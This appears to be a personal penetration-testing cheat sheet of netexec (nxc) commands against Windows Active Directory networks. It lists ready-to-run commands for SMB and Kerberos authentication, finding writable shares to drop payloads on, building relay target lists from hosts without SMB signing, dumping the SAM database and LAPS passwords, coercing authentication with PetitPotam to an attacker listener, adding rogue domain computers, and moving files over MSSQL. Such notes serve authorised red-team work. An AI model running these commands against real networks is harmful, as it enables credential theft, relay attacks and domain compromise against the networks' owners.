#
netexec (nxc)
nxc "is a network service exploitation tool that helps automate assessing the security of large networks."
#
Basic SMB auth
nxc smb somehost -u user -p 'Winter2027!'
#
Basic SMB auth (Kerberos)
I like to use getTGT, then export KRB5CCNAME=user.ccache
and then here are some enumeration examples:
Enumerate domain users
nxc ldap domain.com --use-kcache --kdcHost domain.com --users
Connect to host with SMB:
nxc smb SOMECOOLSERVER --use-kcache
#
Turn on logging
To log every nxc command and output to a file, find the nxc.conf
file (in my Kali it was at /home/kali/.nxc/nxc.conf
) and enable logging:
log_mode = True
#
Change the Pwn3d label
You can make that something more professional if you want - just edit the /home/kali/.nxc/nxc.conf
file and change:
pwn3d_label = Compromised!
#
Find shares
nxc smb pcs.txt -u 'username' -p 'password' --shares
#
Find only shares with READ or WRITE access
nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE
#
Filtering shares
If you want to find just READ/WRITE shares for example:
nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE
Or just WRITE:
nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares WRITE
#
Cleaning up share list from log file
If you've turned on logging (see top of this page) here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try and drop tricky farmer payloads.
grep -i write log_2024-08-24-22-17-32.log | awk '{print $9,$10}' | sort > shares-i-can-write-to.txt
#
Find hosts with/without SMB signing
nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txt
#
Find hosts with/without SMB signing (alternate way)
#
grep for anything where signing is set to false
nxc smb pcs.txt -u '' -p '' > signingcheck.txt
If you want to get kind of fancy-pantsy you can take that grep
to the next level by pulling out all hosts with SMB signing disabled and sorting by the host name:
cat signingcheck.txt| grep -i "signing:False" | awk '{print $0 " " $4}' | sort -k4,4 > no-signing-for-these-folks.txt
#
Find hosts running WebClient service
nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdav
#
Find pre-created computer accounts
nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2k
#
Dump SAM database
nxc smb VICTIM -u lowpriv -p 'Winter2026!' --sam
#
Coerce authentication
The nxc wiki has an interesting page on this - talking about the various ways nxc can coerce authentication.
NOTE
Instead of using the METHOD option, you can use its short form M. Similarly, the argument LISTENER can be shortened to L.
This also applies to the names of the vulnerabilities when specifying a method.
M=p // Invalid, as both petitpotam and printerbug start with ‘p’ so modules gives error
M=pr // Matches printerbug
M=pe // Matches petitpotam
M=dfs // Matches dfscoerce
#
Coerce via PetitPotam:
nxc smb SOMEHOST -u user -p 'pass' -M coerce_plus -o LISTENER=MY.KALI.IP.ADDRESS METHOD=pe
#
Add computer to the domain
nxc smb domain.com -u arnold -p JingleAllTheWay -M add-computer -o NAME=YOURMOM PASSWORD=Omglol123!
#
MSSQL commands
Lifted from the nxc wiki
#
Execute database commands
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
#
Get/put files
Get:
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\some\\file\\in-a-subdirectory\\file..txt /tmp/file
Put:
nxc 192.168.212.134 -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt
#
Dump LAPS passwords
Using an account with rights to do so:
nxc smb VICTIMSERVER -u user-with-LAPS-reading-rights -p 'YerP4$$w0rd!' --laps